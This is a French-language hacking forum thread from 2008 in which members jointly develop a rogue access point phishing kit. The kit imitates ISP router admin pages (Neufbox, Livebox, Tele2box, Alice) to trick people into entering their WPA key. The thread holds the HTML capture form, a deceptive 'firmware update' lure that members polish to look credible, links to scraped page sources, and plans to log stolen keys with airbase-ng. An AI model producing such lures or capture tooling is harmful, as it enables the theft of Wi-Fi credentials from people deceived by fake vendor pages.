Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#151 24-11-2008 23:50:10

Tite-Live
Membre Indétronable

Re : Technique de recuperation de clef WPA par rogue et PHP.

La bannière marche, gratz smile par contre le ":" est toujours à la ligne :x

Mickey (j'ai pas IE7 sous la main, que IE6 :* ) pourrais tu voir si il y a le même type d'erreurs sur mes pages ?

Merci d'avance big_smile

V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#152 24-11-2008 23:57:48

M1ck3y
Administrateur
Lieu : Lost in the darkness

Numericable et Freebox by Tite-Live: nickel sous ie7 et firefox wink

#153 24-11-2008 23:59:09

webcapitain
Membre Indéboulonnable

Je ne comprend pas tout marche nickel chez moi sauf le menu aide mais ç'est pas trop grave si il se referme pas, pour le

confirmation :

ça devrai marcher vu que j'ai laisser de l'espace ! je ne comprend pas... actualise et actualise encore c'est peu etre un bug de frames et de fichiers temporaires.

#154 25-11-2008 00:00:45

webcapitain
Membre Indéboulonnable

pour le menu aide pourquoi le script marche pour le numericable pourtant je croyais que tite-live ma donné la meme source ?????

Dernière modification par webcapitain (25-11-2008 00:01:08)

#155 25-11-2008 00:01:47

webcapitain
Membre Indéboulonnable

j'aime pas les problemmes sad !

#156 25-11-2008 00:06:53

webcapitain
Membre Indéboulonnable

sinon chez moi tou marche sauf "aide" sous ie7
confirmez svp

Dernière modification par webcapitain (25-11-2008 00:07:15)

#157 25-11-2008 00:10:08

M1ck3y
Administrateur

Oui voila. Sous ie7 il y a les menus d'aide qui ne se referment pas, et la page Livebox affiche un triangle jaune d'erreur en bas du navigateur.

#158 25-11-2008 00:10:36

Tite-Live
Membre Indétronable

tu m'étonnes que c'est la même source, j'ai fait des copiés/collés de mon code yikes Au maximum tu peux vérifier (;

sinon, j'ai vidé le cache et rechargé la page... toujours le ":" à la ligne
Pour moi c'est plutôt un problème de tableaux,

<form onsubmit="return valide()" action="valid.php" name="formu" method="post">
<table width="334" height="57" border="0">
<tbody>
<tr>
<td>Clef WPA :</td>
<td>
<label>
<input id="textfield" type="text" size="30" name="wpa"/>
</label>
</td>
</tr>
<tr>
<td>Confirmation :</td>
<td>
<input id="textfield2" type="text" size="30" name="conf"/>
</td>
</tr>
<tr>
<td width="120"> </td>
<td width="204">
<label>
<input id="button" type="submit" value="Valider" name="button"/>
</label>
</td>
</tr>
</tbody>
</table>
</form>

Par défaut, la case confirmation n'a pas assez de place pour avoir le ":" à l'intérieur. Il faudrait changer sa taille... mais je ne suis pas du tout un pro des tableaux, et puis on verra demain big_smile

Bonne nuit all ~ !

Dernière modification par Tite-Live (25-11-2008 00:12:10)

#159 25-11-2008 00:14:37

webcapitain
Membre Indéboulonnable

Bon pour confirmation la sa devrai etre bon ! j'ai collé "confirmation:"
avant de partir confirme moi stp j'aime pas laisser les pb neutral

Dernière modification par webcapitain (25-11-2008 00:15:25)

#160 25-11-2008 00:19:29

webcapitain
Membre Indéboulonnable

arf bon tan pis. bonne nuit a tous big_smile

#161 25-11-2008 00:42:57

Grand Hibou
Membre d'honneur

Pour la neufbox, il faudrait remplacer "en pleine sécurité" par "en toute sécurité" sinon ca va faire très louche coté français! lol  lol
et " nous vous remercions de votre compréhension" n'est pas adéquat dans le contexte non plus.

Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

#162 25-11-2008 01:45:50

webcapitain
Membre Indéboulonnable

Grand Hibou a écrit :

Pour la neufbox, il faudrait remplacer "en pleine sécurité" par "en toute sécurité" sinon ca va faire très louche coté français! lol  lol
et " nous vous remercions de votre compréhension" n'est pas adéquat dans le contexte non plus.

oui tu as raison, je modifie ceci demain dans la journée.
Merci Grand Hibou wink

#163 25-11-2008 08:21:31

Tite-Live
Membre Indétronable

J'ai trouvé quelques fautes mitoo smile.

Votre Neufbox® a[small]à[/small] subi une mise à jour complète vers le firmware v3.5.
Pour votre sécurité, une procédure de vérification doit être faite pour les utilisateurs du réseau sans fil WIFI®

Vous devez entrer votre passphrase WPA actuelle dans le champ ci[small]çi[/small] dessous et valider
Clef WPA:

Confirmation :

Aide

Si vous n'avez pas modifié votre clef WEP/WPA, la clef par défaut se trouve en dessous de votre Neufbox® :

#164 25-11-2008 09:42:48

webcapitain
Membre Indéboulonnable

mdr c'est la guerre du français entre nous maintenant lol bon un pti coup de word et de  correcteur

#165 25-11-2008 09:44:35

webcapitain
Membre Indéboulonnable

heu elles sont ou les fautes ? hmm

#166 25-11-2008 09:45:57

webcapitain
Membre Indéboulonnable

aah j'avais pas vu que tu as corrigé et souligné yikes

#167 25-11-2008 10:00:13

webcapitain
Membre Indéboulonnable

Bon les connexions ftp sont bloqués à ma formation donc je peux pas corriger ceci . je m'en occupe ce soir dés que je rentre

#168 25-11-2008 18:02:46

Tite-Live
Membre Indétronable

Bon, je suis rentré de mon stage...

Vu que tu as fait la Neufbox SFR, je vais m'occuper de la neufbox tout-court, car la plupart des foyers ont encore une "vieille" neufbox.
Au programme, effets visuels, utilisation des cookies et PHP !
Youpi !

#169 25-11-2008 20:47:46

webcapitain
Membre Indéboulonnable

oui.
bon la je vais partir mais quand je rentre je m'occupe de la correction (désolé j'ai été invité à une soirée a ne pas louper lol) et demain je commencerais surement une nouvelle box

#170 25-11-2008 22:42:15

M1ck3y
Administrateur

Les news du soir: une nouvelle interface d'administration disponible, il s'agit de la télé2box (speedtouch).

Quelques screens:

Accueil:

accueil.png
Image taille réelle ici.

Infos & config:

speedtouch.png
Image taille réelle ici.

Sans fil:

sans-fil.png
Image taille réelle ici.

Et le meilleur pour la fin, la détection d'intrusions:

detection-intrusion.png
Image taille réelle ici.

Cette fonctionnalité est vraiment un sérieux plus sur cette box qui est dotée par défaut, je le rappelle:

-D'un encryptage WEP 64 bits
-D'un filtrage mac désactivé
-D'un essid diffusé en clair
-D'une interface d'administration sans login ni password
-Et pour couronner le tout, l'algo de génération des clés est public lol

Voici la preview: Page d'accueil Télé2box Speedtouch. Et voici l'archive avec les sources plus css et images des pages accueil et wlan: archive source pages Télé2box Speedtouch.

Sinon je viens aussi de trouver un link nickel pour l'interface d'administration Alice: Interface admin Alicebox. Là, on est vraiment dans la box. En complément, si vous souhaitez faire quelque chose de plus classe qui colle avec leur site aliceadsl.fr, je viens d'y passer un coup d'aspiro et j'ai récupéré des belles images qui sont packées dans cette archive: Images Alice.

Là en semaine je n'ai plus le temps de me concentrer et de pouvoir travailler comme je le voudrais sur airbase-ng (j'ai besoin de calme et de temps quand je me lance là dedans), je vais essayer de me procurer grace à des personnes que je connais encore d'autres pages issues de panels admin de différentes box histoire de vous approvisionner en sources de pages. Comme le développement de la partie airbase-ng risque de prendre du temps, je me dis qu'il serait bien de commencer à s'intéresser au scriptage de la partie serveur. En effet, avoir un script fonctionnel coté serveur permettrait déja d'utiliser les pages sur un point d'accès modifié, ou bien avec une carte wifi en mode master. Pour inclure airbase-ng, je pense que ça prendra un peu de temps. Donc j'aurais besoin de vos conseils: comment allons nous créer notre fichier de logs? Le but est de récupérer la date & heure (il faudrait savoir comment récupérer ça en bash), essid (à récupérer depuis le fichier essid.txt), clé (à récupérer depuis le fichier wpa.txt). Une fois qu'on aura réussi à trouver le système pour confectionner notre fichier de logs, je me suis dit que ça serait sympa de pouvoir utiliser les données contenues dans ce fichier de logs pour les afficher en html sur une page avec un petit design sympa, qu'est ce que vous en dites? Ca vous parait possible de récupérer le contenu d'un fichier .txt et de l'inclure dans une page qui serait notre page de statistiques? Si vous m'aidez un peu pour tout ça, je vais démarrer assez rapidement le scriptage de la partie serveur de notre outil, là je suis bien motivé big_smile

J'attend vos réponses, merci de vos conseils.

#171 25-11-2008 23:04:16

Tite-Live
Membre Indétronable

Merci pour toutes ces interfaces Mickey big_smile ! Avec tout ça, on a du boulot disdonc lol
En parlant de boulot, la Neuf Box est la dernière interface que je fais cette semaine, j'ai vraiment trop de travail pour pouvoir faire du bon boulot.... (enfin, je ferai certainement une autre page ce week-end, mais bon :] )

comment allons nous créer notre fichier de logs? Le but est de récupérer la date & heure (il faudrait savoir comment récupérer ça en bash), essid (à récupérer depuis le fichier essid.txt), clé (à récupérer depuis le fichier wpa.txt). Une fois qu'on aura réussi à trouver le système pour confectionner notre fichier de logs, je me suis dit que ça serait sympa de pouvoir utiliser les données contenues dans ce fichier de logs pour les afficher en html sur une page avec un petit design sympa, qu'est ce que vous en dites? Ca vous parait possible de récupérer le contenu d'un fichier .txt et de l'inclure dans une page qui serait notre page de statistiques? Si vous m'aidez un peu pour tout ça, je vais démarrer assez rapidement le scriptage de la partie serveur de notre outil, là je suis bien motivé big_smile

Une page de statistiques, mon rêve big_smile ! Ça c'est un TP intéressant ! lol
Moi dans tous les cas je suis prêt, et puis c'est mon métier, programmateur web, faut bien que j'm'exerce big_smile
Il faut voir avec vous, mais pour ce genre d'outil une page avec un design black style crack-wifi.com/wifizoo et une récupération des fichiers avec PHP parait simple et de bon goût nan ? smile

tiens, au fait, vu que j'aimerais bien coder une interface graphique pour ce tool [small](sauf si quelqu'un d'autre veut ? )[/small], c'est GTK ou QT qui est installé par défaut sous Backtrack ? Histoire de savoir si il faut pyQt ou pyGTK lol !

C'est fou la vitesse à laquelle avance ce projet ! cool

Tilii !

#172 25-11-2008 23:18:05

M1ck3y
Administrateur

Une page de stats tout en php avec un joli design classe à la wifizoo black? Wow, ça serait super! Ah oui, en voila une excellente idée smile

Bon, alors Backtrack utilise l'environnement de bureau KDE, donc à priori il tourne sous Qt. Comment est ce que je peux te le confirmer?

PS: Tu as vu, j'ai édité mon précédent message, et j'ai rajouté de quoi faire encore une box big_smile

#173 25-11-2008 23:26:12

Tite-Live
Membre Indétronable

Alice et Tele2 ! Wahou ! Finalement peut-être que je trouverai le temps de faire une petite papage, c'est trop tentant là big_smile ! Merciiiiiii ! *mode gamin*

Qt... comment le confirmer... en fait je suis un flemmard, j'aurais du aller sur wikipédia big_smile

Wikipedia a écrit :

La version majeure actuelle de KDE est la 4.1 (sortie en juillet 2008[1]) et utilise Qt 4. KDE4 propose une refonte du système multimédia, de la gestion des périphériques, de l'interface graphique et de plusieurs autres composants majeurs.

Bah si t'aimes bien le diz wifizoo, c'est toujours simple de faire un diz sympa en s'inspirant d'un beau diz ;D

Tilii

#174 25-11-2008 23:43:52

M1ck3y
Administrateur

Pour info, BT3 Final utilise KDE 3.5.7.

Sinon oui, il faut reconnaitre que le wifizoo black est vraiment réussi. Son auteur s'est d'ailleurs inspiré d'un css qu'il a pris sur cssplay.co.uk, je l'ai vu dans les commentaires du css. Bon, enfin on n'est pas obligé de faire la meme chose, mais c'est une bonne source d'inspiration. Enfin c'est toi qui vois puisque tu m'as l'air bien motivé pour ce projet, je te fais confiance wink

#175 26-11-2008 08:48:49

Tite-Live
Membre Indétronable

Bon, j'ai fini le plus gros de la neufbox, je m'occupe des bugs ce soir
-> http://vms2linux.free.fr/Crack-Wpa/Neuf%20Box/

Annonce